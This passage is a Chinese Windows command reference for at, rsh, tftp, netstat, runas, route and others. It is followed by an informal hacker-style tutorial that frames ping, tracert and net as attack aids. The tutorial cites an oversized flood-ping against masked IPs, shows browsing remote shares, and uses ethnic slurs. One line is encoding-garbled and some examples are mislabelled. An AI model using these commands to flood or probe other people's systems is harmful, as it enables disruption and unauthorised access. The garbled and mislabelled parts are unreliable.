    指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。 
    /? 
    在命令提示符显示帮助。 
    注释 
    Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅“相关主题”。 
    使用 at 
    使用 at 命令时,要求您必须是本地 Administrators 组的成员。 

    加载 Cmd.exe 
    在运行命令之前,At 不会自动加载 Cmd.exe (命令解释器)。如果没有运行可执行文件 (.exe),则在命令开头必须使用如下所示的方法专门加载 Cmd.exe: 

    cmd /c dir > c:\test.out。 

    查看已计划的命令 
    当不带命令行选项使用 at 时,计划任务会出现在类似于以下格式的表中: 

    Status ID Day Time Command Line 
    OK 1 Each F 4:30 PM net send group leads status due 
    OK 2 Each M 12:00 AM chkstor > check.file 
    OK 3 Each F 11:59 PM backup2.bat 
    包含标识号 (ID) 
    当在命令提示下使用带有标识号 (ID) 的 at 命令时,单个任务项的信息会显示在类似于下面的格式中: 

    Task ID: 1 

    Status:OK 

    Schedule:Each F 

    Time of Day:4:30 PM 

    Command:net send group leads status due当计划带有 at 的命令(尤其是带有命令行选项的命令)后,要通过键入不带命令行选项的 at 来检查该命令语法是否输入正确。如果显示在“命令行”列中的信息不正确,请删除该命令,然后重新键入它。如果还不正确,则可以在重新键入该命令时让它少带些命令行选项。 

    查看结果 
    使用 at 的已经计划的命令作为后台程序运行。运行结果不会显示在计算机上。要将输出重定向到文件,请使用重定向符号 (> )。如果将输出重定向到文件,则不论是在命令行还是在批处理文件中使用 at,都需要在重定向符号之前使用转义符 (^)。例如,要重定向输出到 Output.text 文件,则要键入: 

    at 14:45 c:\test.bat ^>c:\output.txt 

    执行命令的当前目录为 systemroot 文件夹。 

    更改系统时间 
    在使用 at 命令计划了要运行的命令之后,如果更改了计算机的系统时间,则通过键入不带命令行选项的 at 可使 at 计划程序与修改后的系统时间同步。 

    存储命令 
    已计划的命令存储在注册表中。这样,如果重新启动“计划”服务,则不会丢失计划任务。 

    连接到网络驱动器 
    对于需要访问网络的计划作业,请不要使用已重新定向的驱动器。“计划”服务可能无法访问这些重定向的驱动器,或者,在该计划任务运行时如果有其他用户登录,则这些重定向的驱动器可能不会出现。因此,对于计划作业,请使用 UNC 路径。例如: 

    at 1:00pm my_backup \\server\share 

    请不要使用下述语法(其中 x: ?表示由用户建立的连接): 

    at 1:00pm my_backup x: 

    如果计划了一个使用驱动器号的 at 命令来连接共享目录,则应包含一个 at 命令以使在完成该驱动器的使用时断开与驱动器的连接。如果不能断开与驱动器的连接,则在命令提示下,所指派的驱动器号将不可用。 

    范例 
    要显示 Marketing 服务器上已计划的命令列表,请键入: 

    at \\marketing 
    要了解服务器 Corp 上标识号为 3 的命令的详细信息,请键入: 

    at \\corp 3 
    要计划在上午 8:00 于 Corp 服务器上运行网络共享命令,并将该列表重定向到 Maintenance 服务器的 Corp.txt 文件(位于 Reports 共享目录下)中,请键入: 

    at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp.txt" 
    为了在每五天后的午夜将 Marketing 服务器的硬盘驱动器备份到磁带驱动器,首先创建名为 Archive.cmd 的批处理程序(它含有备份命令),然后计划该批处理程序的运行,为此请键入: 

    at \\marketing 00:00 /every:5,10,15,20,25,30 archive 
    要取消当前服务器上已计划的所有命令,请按下述方法清除 at 计划信息: 

    at /delete 
    如果要运行的命令不是可执行 (.exe) 文件,请按如下所示的方法在该命令之前使用 cmd /c 来加载 Cmd.exe: 

    cmd /c dir > c:\test.out。 
    Rsh 
    在运行 RSH 服务的远程计算机上运行命令。Windows XP 和 Windows 2000 不提供 RSH 服务。Windows 2000 Server Resource Kit 提供名为 Rshsvc.exe 的 RSH 服务。使用不带参数的 rsh 显示帮助。 

    语法 
    rsh [Host] [-l UserName] [-n] [Command] 

    参数 
    Host 
    指定运行 command 的远程计算机。 
    -l UserName 
    指定远程计算机上使用的用户名。在省略情况下,使用当前登录用户的名称。 
    -n 
    将 rsh 的输入重定向到 NULL 设备。这防止本地计算机命令结果的显示。 
    Command 
    指定要运行的命令。 
    /? 
    在命令提示符显示帮助。 
    注释 
    标准操作 
    rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。 
    使用重定向符号 
    为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件“RemoteFile”附加到本地文件“LocalFile”中: 

    rsh othercomputer cat remotefile >> localfile 

    以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中: 

    rsh othercomputer cat remotefile ">>" otherremotefile 

    使用 rsh 
    在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。 

    .rhosts 文件 
    .rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。 

    .rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如: 

    host7 #This computer is in room 31A 

    .rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。 

    只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 
    范例 
    要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入: 

    rsh vax1 -l admin1 telcon 

    Tftp 
    向运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件或从运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件。 

    语法 
    tftp [-i] [Host] [{get | put}] [Source] [Destination] 

    参数 
    -i 
    指定二进制图像传送模式(也称为八进制模式)。在二进制图像模式下,文件以一个字节为单位进行传输。在传送二进制文件时使用该模式。如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。该模式将行尾 (EOL) 字符转换为指定计算机的适当格式。传送文本文件时使用该模式。如果文件传送成功,将显示数据传输率。 
    Host 
    指定本地或远程计算机。 
    put 
    将本地计算机上的 Destination 文件传送到远程计算机上的 Source 文件。因为 TFTP 协议不支持用户身份验证,所以用户必须登录到远程计算机,同时文件在远程计算机上必须可写。 
    get 
    将远程计算机上的 Destination 文件传送到本地计算机上的 Source 文件。 
    Source 
    指定要传送的文件。 
    Destination 
    指定将文件传送到的位置。如果省略了 Destination,将假定它与 Source 同名。 
    /? 
    在命令提示符显示帮助。 
    注释 
    使用 get 参数 
    如果将本地计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 put。如果将远程计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 get。 

    Windows XP 或 Windows 2000 不提供一般用途的 TFTP 服务器。Windows 2000 提供的 TFTP 服务器服务只为 Windows XP 和 Windows 2000 客户端计算机提供远程引导功能。 
    只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 
    范例 
    要从本地计算机将文件 Users.txt 传送到远程计算机 vax1 上的 Users19.txt,请键入: 

    tftp vax1 put users.txt users19.txt 
    Nbtstat 
    显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。 

    语法 
    nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval] 

    参数 
    -a remotename 
    显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。NetBIOS 名称表是运行在该计算机上的应用程序使用的 NetBIOS 名称列表。 
    -A IPAddress 
    显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。 
    -c 
    显示 NetBIOS 名称缓存内容、NetBIOS 名称表及其解析的各个地址。 
    -n 
    显示本地计算机的 NetBIOS 名称表。Registered 中的状态表明该名称是通过广播或 WINS 服务器注册的。 
    -r 
    显示 NetBIOS 名称解析统计资料。在配置为使用 WINS 的 Windows XP 计算机上,该参数将返回已通过广播和 WINS 解析和注册的名称号码。 
    -R 
    清除 NetBIOS 名称缓存的内容并从 Lmhosts 文件中重新加载带有 #PRE 标记的项目。 
    -RR 
    重新释放并刷新通过 WINS 注册的本地计算机的 NetBIOS 名称。 
    -s 
    显示 NetBIOS 客户和服务器会话,并试图将目标 IP 地址转化为名称。 
    -S 
    显示 NetBIOS 客户和服务器会话,只通过 IP 地址列出远程计算机。 
    Interval 
    重新显示选择的统计资料,可以中断每个显示之间的 Interval 中指定的秒数。按 CTRL+C 停止重新显示统计信息。如果省略该参数, netstat 将只显示一次当前的配置信息。 
    /? 
    在命令提示符显示帮助。 
    注释 
    Nbtstat 命令行参数区分大小写。 
    下表列出了由 Nbtstat 生成的列标题。 标题 说明 
    Input 接收的字节数。 
    Output 发送的字节数。 
    In/Out 该连接是否从计算机(传出)或者其他计算机到本地计算机(传入)。 
    Lift 名称表缓存项在被清除之前所存留的时间。 
    Local Name 本地 NetBIOS 名称与连接相关联。 
    Remote Host 与远程计算机相关的名称或 IP 地址。 
    <03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。 
    Type 名称类型。名称可以是单个名称,也可以是组名称。 
    Status 远程计算机上是否在运行 NetBIOS 服务(“已注册”),或同一计算机名是否已注册了相同的服务(“冲突”)。 
    State NetBIOS 连接的状态。 

    下表列出了可能的 NetBIOS 连接状态。 状态 说明 
    已连接 会话已建立。 
    关联 连接的终结点已经被创建并与 IP 地址关联。 
    正接听 该终结点对内向连接可用。 
    空闲 该结束点已被打开单不能接收连接。 
    正在连接 会话处于连接阶段。在此阶段正在解析所选目标的由名称到 IP 地址的映射。 
    接受 入站会话当前正在被接受,将在短期内连接。 
    重新连接 会话将试图重新连接(如果第一次连接失败)。 
    出站 会话正处于连接阶段。此阶段正在创建 TCP 连接。 
    入站 入站会话在连接期。 
    正在断开 会话正在断开连接。 
    已中断连接 本地计算机已断开连接,并正等待远程系统的确认。 
    只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 
    范例 
    要显示 NetBIOS 计算机名为 CORP07 的远程计算机的 NetBIOS 名称表,请键入: 

    nbtstat -a CORP07 

    要显示所分配 IP 地址为 10.0.0.99 的远程计算机的 NetBIOS 名称表,请键入: 

    nbtstat -A 10.0.0.99 

    要显示本地计算机的 NetBIOS 名称表,请键入: 

    nbtstat -n 

    要显示本地计算机 NetBIOS 名称缓存的内容,请键入: 

    nbtstat -c 

    要清除 NetBIOS 名称缓存并重新装载本地 Lmhosts 文件中带标记 #PRE 的项目,请键入: 

    nbtstat -R 

    要释放通过 WINS 服务器注册的 NetBIOS 名称并对其重新注册,请键入: 

    nbtstat -RR 

    要每隔 5 秒以 IP 地址显示 NetBIOS 会话统计资料,请键入: 

    nbtstat -S 5 

    Netstat 
    显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。 

    语法 
    netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval] 

    参数 
    -a 
    显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。 
    -e 
    显示以太网统计信息,如发送和接收的字节数、数据包数。该参数可以与 -s 结合使用。 
    -n 
    显示活动的 TCP 连接,不过,只以数字形式表现地址和端口号,却不尝试确定名称。 
    -o 
    显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的“进程”选项卡上找到基于 PID 的应用程序。该参数可以与 -a、-n 和 -p 结合使用。 
    -p Protocol 
    显示 Protocol 所指定的协议的连接。在这种情况下,Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果该参数与 -s 一起使用按协议显示统计信息,则 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。 
    -s 
    按协议显示统计信息。默认情况下,显示 TCP、UDP、ICMP 和 IP 协议的统计信息。如果安装了 Windows XP 的 IPv6 协议,就会显示有关 IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 协议的统计信息。可以使用 -p 参数指定协议集。 
    -r 
    显示 IP 路由表的内容。该参数与 route print 命令等价。 
    Interval 
    每隔 Interval 秒重新显示一次选定的信息。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只打印一次选定的信息。 
    /? 
    在命令提示符显示帮助。 
    注释 
    与该命令一起使用的参数必须以连字符 (-) 而不是以短斜线 (/) 作为前缀。 
    Netstat 提供下列统计信息: 
    Proto 
    协议的名称(TCP 或 UDP)。 

    Local Address 
    本地计算机的 IP 地址和正在使用的端口号。如果不指定 -n 参数,就显示与 IP 地址和端口的名称对应的本地计算机名称。如果端口尚未建立,端口以星号(*)显示。 

    Foreign Address 
    连接该插槽的远程计算机的 IP 地址和端口号码。如果不指定 -n 参数,就显示与 IP 地址和端口对应的名称。如果端口尚未建立,端口以星号(*)显示。 

    (state) 
    表明 TCP 连接的状态。可能的状态如下: 

    CLOSE_WAIT 

    CLOSED 

    ESTABLISHED 

    FIN_WAIT_1 

    FIN_WAIT_2 

    LAST_ACK 

    LISTEN 

    SYN_RECEIVED 

    SYN_SEND 

    TIMED_WAIT 
    有关 TCP 连接状态的信息,请参阅 RFC 793。 

    只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 
    范例 
    要想显示以太网统计信息和所有协议的统计信息,请键入下列命令: 

    netstat -e -s 

    要想仅显示 TCP 和 UDP 协议的统计信息,请键入下列命令: 

    netstat -s -p tcp udp 

    要想每 5 秒钟显示一次活动的 TCP 连接和进程 ID,请键入下列命令: 

    nbtstat -o 5 

    要想以数字形式显示活动的 TCP 连接和进程 ID,请键入下列命令: 

    nbtstat -n –o 

    Runas 
    允许用户用其他权限运行指定的工具和程序,而不是用户当前登录提供的权限。 

    语法 
    runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program 

    参数 
    /profile 
    加载用户的配置文件。/profile 是默认值。 
    /no profile 
    /noprofile 指定不加载用户的配置文件。这使应用程序载入的更加快速,但是在一些应用程序中也会引起错误。 
    /env 
    指定当前使用的网络环境,而不是用户的本地环境。 
    /netonly 
    指明指定的用户信息只用于远程访问。 
    /smartcard 
    /smartcard 表示凭据是否是由智能卡提供的。 
    /showtrustlevels 
    列出 /trustlevel 开关项。 
    /trustlevel 
    指定应用程序运行所在的授权级别。使用 /showtrustlevels 查看可用的信任级别。 
    /user:UserAccountName 
    指定在其下运行程序的用户帐户的名称。用户帐户的格式应是 user@domain 或 domain\user。 
    程序 
    指定要用在 /user 中指定的帐户运行的程序或命令。 
    /? 
    在命令提示符显示帮助。 
    注释 
    管理员可以使用一个权限受限制的帐户执行日常、非管理性的任务,只有在执行特定管理任务时,才使用一个权限更大的帐户。要不经过注销再重新登录就完成这样的任务,可以用一般帐户登录,然后使用 runas 命令来运行需要更大权限的工具。 
    有关 runas 命令的使用范例,请参阅“相关主题”。 
    尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或“控制面板”项。 
    如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一: 
    /user:AdministratorAccountName@ComputerName 

    /user:ComputerName\AdministratorAccountName 

    如果想以域管理员身份使用这个命令,键入下列参数之一: 
    /user:AdministratorAccountName@DomainName 

    /useromainName\AdministratorAccountName 

    runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及“控制面板”项。作为另一组(例如“Users”或“Power Users”组)的成员登录到计算机时,可以以管理员的身份运行。 
    可以使用 runas 命令来启动任何程序、MMC 控制器或“控制面板”项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、“控制面板”项在系统中及对该用户帐户均可用. 
    runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。 
    如果尝试使用 runas 从网络位置启动程序、MMC 控制台或“控制面板”项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。 
    有些项,例如“打印机”文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。 
    如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在“计算机管理”中单击“服务和应用程序”,然后单击“服务”。要测试用户帐户,请尝试使用该帐户登录合适的域。 
    范例 
    要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例,请键入: 

    runas /user:localmachinename\administrator cmd 
    系统提示时,键入管理员密码。 

    要使用名为 companydomain\domainadmin 的域管理员帐户启动“计算机管理”管理单元实例,请键入: 

    runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc" 
    当提示时,键入帐户密码。 

    要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动“记事本”实例,请键入: 

    runas /user:user@domain.microsoft.com "notepad my_file.txt" 
    当提示时,键入帐户密码。 
    要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例,请键入: 

    runas /netonly /user:domain\username "command" 
    domain\username 必须是有足够权限管理服务器的用户。当提示时,键入帐户密码。 
    Route 
    在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。 

    语法 
    route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]] 

    参数 
    -f 
    清除所有不是主路由(网掩码为 255.255.255.255 的路由)、环回网络路由(目标为 127.0.0.0,网掩码为 255.255.255.0 的路由)或多播路由(目标为 224.0.0.0,网掩码为 240.0.0.0 的路由)的条目的路由表。如果它与命令之一(例如 add、change 或 delete)结合使用,表会在运行命令之前清除。 
    -p 
    与 add 命令共同使用时,指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下,启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时,则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes。 
    Command 
    指定要运行的命令。下表列出了有效的命令。 命令 目的 
    add 添加路由 
    change 更改现存路由 
    delete 删除路由 
    print 打印路由 

    Destination 
    指定路由的网络目标地址。目标地址可以是一个 IP 网络地址(其中网络地址的主机地址位设置为 0),对于主机路由是 IP 地址,对于默认路由是 0.0.0.0。 
    mask subnetmask 
    指定与网络目标地址相关联的网掩码(又称之为子网掩码)。子网掩码对于 IP 网络地址可以是一适当的子网掩码,对于主机路由是 255.255.255.255 ,对于默认路由是 0.0.0.0。如果忽略,则使用子网掩码 255.255.255.255。定义路由时由于目标地址和子网掩码之间的关系,目标地址不能比它对应的子网掩码更为详细。换句话说,如果子网掩码的一位是 0,则目标地址中的对应位就不能设置为 1。 
    Gateway 
    指定超过由网络目标和子网掩码定义的可达到的地址集的前一个或下一个跃点 IP 地址。对于本地连接的子网路由,网关地址是分配给连接子网接口的 IP 地址。对于要经过一个或多个路由器才可用到的远程路由,网关地址是一个分配给相邻路由器的、可直接达到的 IP 地址。 
    metric Metric 
    为路由指定所需跃点数的整数值(范围是 1 ~ 9999),它用来在路由表里的多个路由中选择与转发包中的目标地址最为匹配的路由。所选的路由具有最少的跃点数。跃点数能够反映跃点的数量、路径的速度、路径可靠性、路径吞吐量以及管理属性。 
    if Interface 
    指定目标可以到达的接口的接口索引。使用 route print 命令可以显示接口及其对应接口索引的列表。对于接口索引可以使用十进制或十六进制的值。对于十六进制值,要在十六进制数的前面加上 0x。忽略 if 参数时,接口由网关地址确定。 
    /? 
    在命令提示符显示帮助。 
    注释 
    路由表中 跃点数 一列的值较大是由于允许 TCP/IP 根据每个 LAN 接口的 IP 地址、子网掩码和默认网关的配置自动确定路由表中路由的跃点数造成的。默认启动的自动确定接口跃点数确定了每个接口的速度,调整了每个接口的路由跃点数,因此最快接口所创建的路由具有最低的跃点数。要删除大跃点数,请在每个 LAN 连接的 TCP/IP 协议的高级属性中禁用自动确定接口跃点数。 
    如果在 systemroot\System32\Drivers\Etc 文件夹的本地网络文件中存在适当的条目,名称可以用于 Destination。只要名称可以通过“域名系统” (DNS) 查询这样的标准主机名解析技术分解为 IP 地址,就可以将其用于 Gateway,DNS 查询使用存储在 systemroot\System32\Drivers\Etc 文件夹下的本地主机文件和 NetBIOS 名称解析。 
    如果是 print 或 delete 命令,可以忽略 Gateway 参数,使用通配符来表示目标和网关。Destination 的值可以是由星号 (*) 指定的通配符。如果指定目标含有一个星号 (*) 或问号 (?),它被看作是通配符,只打印或删除匹配的目标路由。星号代表任意一字符序列,问号代表任一字符。例如, 10.*.1, 192.168.*、 127.* 和 *224* 都是星号通配符的有效使用。 
    使用了无效的目标和子网掩码(网掩码)值的组合,会显示“Route:bad gateway address netmask”错误消息。目标中有一位或多位设置为 1,而其在子网掩码中的对应位设置为 0 时会发生这个错误。可以通过二进制表示法表示目标和子网掩码来检查这种情况。以二进制表示的子网掩码包括表示目标网络地址部分的一连串的 1 和表示目标主机地址部分的一连串的 0 两个部分。查看目标以确定目标的主机地址部分(由子网掩码所定义)是否有些位设置成了 1。 
    只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 参数。Windows 95 或 Windows 98 的 route 命令不支持该参数。 
    只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 
    范例 
    要显示 IP 路由表的完整内容,请键入: 
    route print 

    要显示 IP 路由表中以 10. 开始的路由,请键入: 

    route print 10.* 

    要添加默认网关地址为 192.168.12.1 的默认路由,请键入: 

    route add 0.0.0.0 mask 0.0.0.0 192.168.12.1 

    要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的路由,请键入: 

    route add 10.41.0.0 mask 255.255.0.0 10.



    网络安全较有关系的几个命令有:ping winipcfg tracert netat netstat 
    1. ping:这是TCP/IP协议中最有用的命令之一 
    它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。 
    Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] 
    [-r count] [-s count] [[-j host-list] [-k host-list]] 
    [-w timeout] destination-list 
    Options: 
    -t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去) 
    -a Resolve addresses to hostnames.(把IP转为主机名) 
    -n count Number of echo requests to send.(响应请求的数量) 
    -l size Send buffer size.(封包的大小) 
    -f Set Don't Fragment flag in packet.(信息包中无碎片) 
    -i TTL Time To Live.(时间) 
    -v TOS Type Of Service.(服务类型) 
    -r count Record route for count hops. 
    -s count Timestamp for count hops. 
    -j host-list Loose source route along host-list. 
    -k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)
    -w timeout Timeout in milliseconds to wait for each reply.(timeout的时间) 
    比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用拿睿ǖ比徽庋换嵩斐晌曳阶约旱耐缱枞?
    其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。 

    2. winipcfg: 
    这是用来看自己IP位址的小工具,win98自带,NT里则网络监视器里就能看到IP了,还有个小实用程序叫……好象是叫IPCONFIG吧,没怎么用,都快忘了……这种东东网上其实相当之多,但既然“自带”,又何须外求,何况网上下载的黑客的东东里有没有特洛伊犹未可知,再说了,如果你不是在自己的“爱姬”上运行,岂不是就没法干活?--哈,不好意思,跑题了,但--接着跑两句:可以把一些常用的、经典的工具上传到网上,当作一个备份,什么时候在网吧、某家公司要干活的话,直接下载就是一个完整无缺的工具包了。 
    这个东东相当简单,直接在DOS下键入命令就是了,没有什么参数。 

    3. tracert:是验证通往远程主机路径的实用程序 
    用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name 
    参数: 
    -d Do not resolve addresses to hostnames.(不将IP转为主机名) 
    -h maximum_hops Maximum number of hops to search for target.(最大跟踪数量) 
    -j host-list Loose source route along host-list. 
    -w timeout Wait timeout milliseconds for each reply.(time out 的时间) 
    最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址,你知道该怎么利用它吗? 
    我略为解释一下吧:跟踪通往210.142.192.130的路由,最大30: 
    第一行:*&^%&* 我就是从这里出去的(呵,真不想说^&^) 
    第四行:是不是快要出国了呢? 
    第九行:呀!这是日本鬼子的地盘…… 

    4. net:这可是个非常棒的东西,如果不会用的话,赶紧睁大眼睛噢 
    这个命令的语法是: 可用的命令包括: 
    NET ACCOUNTS NET HELP NET SHARE 
    NET COMPUTER NET HELPMSG NET START 
    NET CONFIG NET LOCALGROUP NET STATISTICS 
    NET CONFIG SERVER NET NAME NET STOP 
    NET CONFIG WORKSTATION NET PAUSE NET TIME 
    NET CONTINUE NET PRINT NET USE 
    NET FILE NET SEND NET USER 
    NET GROUP NET SESSION NET VIEW 
    NET HELP SERVICES 列出用户可以启动的网络服务。 
    NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。 
    NET HELP command MORE 用于逐屏显示帮助。 
    我可就不逐样解释了--这样会把我的手指累坏,就说说常用的两个命令吧 
    a.net view 
    这个命令的语法是:NET VIEW [computername /DOMAIN[:domainname]] 
    NET VIEW /NETWORK:NW [computername] 
    NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时, 
    它就会显示当前域或网络上的计算机上的列表。 
    computername 指用户希望浏览其共享资源的计算机。 
    /DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名, 
    就会显示局域网络上的所有域。 
    /NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算 
    机名,就会显示NetWare 网络中那个计算机上的可用资源。 
    至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行 
    net view ***.***.**.*** 就可以了 
    b.net use 
    这个命令的语法是:NET USE [devicename *] [computernamesharename[volume] [password *]]
    [/USER:[domainname]username] 
    [[/DELETE] [/PERSISTENT:{YES NO}]] 
    NET USE [devicename *] [password *]] [/HOME] 
    NET USE [/PERSISTENT:{YES NO}] 
    NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的 
    连接。当不带选项使用本命令时,它会列出计算机的连接。 
    devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型 
    的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入 
    一个星号来代替一个指定的设备名可以分配下一个可用设备名。 
    computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符, 
    就要将双反斜线 () 和计算机名一起用引号 (" ")括起来。计算机名 
    可以有1 到15 个 字符。 
    sharename 指共享资源的网络名字。 
    volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务 
    (Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务 
    器) 并使之与NetWare 服务器相连。 
    password 指访问共享资源所需要的密码。 
    * 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。 
    /USER 指定连接时的一个不同的用户名。 
    domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。 
    username 指定登录的用户名。 
    /HOME 将用户与他们的宿主目录相连。 
    /DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。 
    /PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。 
    YES 在连接产生时保存它们,并在下次登录时恢复它们。 
    NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被 
    恢复。可以使用 /DELETE 选项开关来删除永久连接。 
    PS:前两天在绿色兵团的贴子里见到一位仁兄的话,与这个命令有异曲共工之妙,也说明一个大概: 
    在浏览器中输入 file:///***.***.**.***c¥ 
    则网上共享的C盘内容就会显示出来了,就仿佛用浏览器上FTP站点看到的一样。各位不妨试试,还可试试举一反三…… 

    5.at: 排定在特定的日期和时间运行某些命令和程序。 
    运行 AT 命令之前必须先启动 Schedule 服务。瞧,现炒就得现卖,刚学了net命令,但这个start命令我可没详述,自已看看帮助文件,摸索一下各种命令的用法吧。 
    C:》net start schedule 
    Schedule 正在启动服务..... 
    Schedulw 服务启动成功。 
    AT [computername] [ [id] [/DELETE] /DELETE [/YES]] 
    AT [computername] time [/INTERACTIVE] 
    [ /EVERY:date[,...] /NEXT:date[,...]] "command" 
    computername 指定远程计算机。 如果省略这个参数 
